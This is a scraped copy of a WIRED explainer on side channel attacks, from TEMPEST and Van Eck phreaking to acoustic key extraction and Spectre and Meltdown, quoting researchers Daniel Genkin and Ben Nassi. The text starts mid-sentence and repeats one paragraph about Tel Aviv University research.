████ # This file was generated bot-o-matically! Edit at your own risk. ████
What Is a Side Channel Attack? [wired.com]:
on machines keeping secrets. But computers, like poker-playing humans, have tells. They flit their eyes when they've got a good hand, or raise an eyebrow when they're bluffing—or at least, the digital equivalent. And a hacker who learns to read those unintended signals can extract the secrets they contain, in what's known as a "side channel attack.".
Side channel attacks take advantage of patterns in the information exhaust that computers constantly give off: the electric emissions from a computer's monitor or hard drive [wired.com], for instance, that emanate slightly differently depending on what information is crossing the screen or being read by the drive's magnetic head. Or the fact that computer components draw different amounts of power when carrying out certain processes [paulkocher.com]. Or that a keyboard's click-clacking can reveal a user's password [springer.com] through sound alone.
"Usually when we design an algorithm we think about inputs and outputs. We don’t think about anything else that happens when the program runs," says Daniel Genkin, a computer scientist at the University of Michigan and a leading researcher in side channel attacks. "But computers don’t run on paper, they run on physics. When you shift from paper to physics, there are all sorts of physical effects that computation has: Time, power, sound. A side channel exploits one of those effects to get more information and glean the secrets in the algorithm."
For a sufficiently clever hacker, practically any accidental information leakage can be harvested to learn something they're not supposed to. As computing gets more complicated over time, with components pushed to their physical limits and throwing off unintended information in all directions, side channel attacks are only becoming more plentiful and difficult to prevent. Look no further than the litany of bugs that Intel and AMD have struggled to patch over the last two years with names like Meltdown, Spectre [wired.com], Fallout, RIDL, or Zombieload [wired.com]—all of which used side channel attacks as part of their secret-stealing techniques.
The most basic form of a side channel attack might be best illustrated by a burglar opening a safe with a stethoscope pressed to its front panel. The thief slowly turns the dial, listening for the telltale clicks or resistance that might hint at the inner workings of the safe's gears and reveal its combination. The safe isn't meant to give the user any feedback other than the numbers on the dial and the yes-or-no answer of whether the safe unlocks and opens. But those tiny tactile and acoustic clues produced by the safe's mechanical physics are a side channel. The safecracker can sort through that accidental information to learn the combination.
One of the earliest and most notorious computer side channel attacks is what the National Security Agency called TEMPEST [wired.com]. In 1943 Bell Labs discovered that a teletype machine would cause a nearby oscilloscope's readings to move every time someone typed on it. This, the Bell Labs researchers quickly realized, was a problem. The teletype machine was meant to allow secure, encrypted communications, but anyone close enough to read its electromagnetic emissions could potentially decipher its secrets. The phenomenon wouldn't be fully documented in public until 1985, when a computer researcher named Wim van Eck published a paper on what would come to be known as "Van Eck Phreaking," reconstructing the images on a computer screen with long-distance detection of the electrical signals it discharges.
Similar electromagnetic leakage attacks have been refined ever since. As recently as 2015, one group of researchers at Tel Aviv University created a $300 gadget that fits in a piece of pita bread [wired.com] and can derive the encryption keys on a nearby laptop's hard drive by picking up its electrical emissions. Other techniques have proven that sound, power usage, or even just the timing patterns in communications can reveal a computer's secrets. The same Tel Aviv University team also found that a microphone picking up the sounds of a computer [tau.ac.il] as it performs decryption can reveal its secret keys, and that patterns in the bursts of encrypted data sent to a web browser can reveal what Netflix or YouTube video someone is watching [github.io], with no access to their computer.
Similar electromagnetic leakage attacks have been refined ever since. As recently as 2015, one group of researchers at Tel Aviv University created a $300 gadget that fits in a piece of pita bread [wired.com] and can derive the encryption keys on a nearby laptop's hard drive by picking up its electrical emissions. Other techniques have proven that sound, power usage, or even just the timing patterns in communications can reveal a computer's secrets. The same Tel Aviv University team also found that a microphone picking up the sounds of a computer [tau.ac.il] as it performs decryption can reveal its secret keys, and that patterns in the bursts of encrypted data sent to a web browser can reveal what Netflix or YouTube video someone is watching [github.io], with no access to their computer.
Computers aren't the only targets of side channel attack targets, points out Ben Nassi, a security researcher at Ben Gurion University. They can be any secret process or communication that produces unintended but meaningful signals. Nassi points to eavesdropping methods like using the movement of gyroscopes in a hacked smartphone as microphones [stanford.edu] to pick up the sounds in a room, or a technique known as "visual microphone [mit.edu]" that uses long-distance video of an object—say, a bag of chips or the leaves of a houseplant—to observe vibrations that reveal a conversation that happened nearby.
Nassi himself, along with a group of researchers at Ben Gurion, revealed a technique last week that can eavesdrop on conversations in a room in realtime by using a telescope to observe the vibrations of a hanging lightbulb inside [wired.com]. "I’d call it a side effect," Nassi says of this broader definition of side channels that goes beyond computers or even machines. "It's a method to compromise confidentiality by analyzing the side effects of a digital or physical process."
And computer-focused side channel attacks have only become more sophisticated. Spectre, Meltdown, and a series of other "microarchitectural" vulnerabilities that affect microprocessors, for instance, all take advantage of a time-based side channel attack. Each uses different techniques to trick a processor into temporarily accessing secret information and then encoding it in a processor's cache, a portion of memory designed to keep certain data close at hand for better efficiency. By then forcing the processor to search for certain information in memory and measuring how quickly the chip accesses it, the hacker can analyze the timing of the processor's responses and learn what's in the cache and what's not, leaking the secret data. (Some researchers consider this a "covert channel" rather than a side channel, since the attacker is essentially planting the information that they will later leak, but official bodies like the Cybersecurity and Infrastructure Security Agency describe Meltdown and Spectre as side-channel attacks [us-cert.gov], as do the creators of the attacks on their website [meltdownattack.com].)
Attacks like Spectre and Meltdown left firms like Intel and other computer manufacturers in a cat-and-mouse game of chasing after their products' accidental information leaks, constantly releasing updates to hide data that's exposed in side channel attacks or pad it with other noise that makes it harder to decipher. As computers become more and more complex, and if the computing industry continues to prioritize performance over security, side channels will still appear, says Michigan's Genkin. In some cases like Spectre and Meltdown, researchers are even digging into years-old mechanics and pulling out secrets that were available for the taking all long—at least, for anyone who could decipher the accidental byproducts of a computer's processes.
"They were always there," says Genkin. "The reason you hear more and more about them is that as we dig further, we find more and more side channels to exploit. And as we find out just how bad they are, we are also learning how to defend against them.”
More Great WIRED Stories
- The Last of Us Part II and its crisis-strewn path to release [wired.com]
- Former eBay execs allegedly made life hell for critics [wired.com]
- The best sex tech and toys for every body [wired.com]
- AI, AR, and the (somewhat) speculative future of a tech-fueled FBI [wired.com]
- Just how historic is the latest Covid-19 science meltdown [wired.com]?
- 👁 What is intelligence, anyway [wired.com]? Plus: Get the latest AI news [wired.com]
- ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums [wired.com] to affordable mattresses [wired.com] to smart speakers [wired.com]